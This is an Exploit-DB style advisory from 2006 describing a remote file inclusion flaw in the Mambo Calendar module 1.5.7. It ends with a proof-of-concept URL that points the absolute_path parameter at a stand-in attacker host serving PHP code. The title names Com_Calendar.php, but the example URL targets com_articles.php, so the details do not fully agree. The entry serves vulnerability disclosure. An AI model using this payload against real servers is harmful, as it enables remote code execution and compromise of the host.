Mambo Module Calendar 1.5.7 - 'Com_Calendar.php' Remote File Inclusion

EDB-ID:

28233

Author:

Matdhule

Type:

webapps

Platform:

PHP

Published:

2006-07-17

source: http://www.securityfocus.com/bid/19027/info

The Calendar module for Mambo is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.

An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.

This issue affects version 1.5.7; other versions may also be vulnerable.

http://www.example.com/[target]/[path]/components/com_articles.php?absolute_path=http://attacker.com/evil.txt?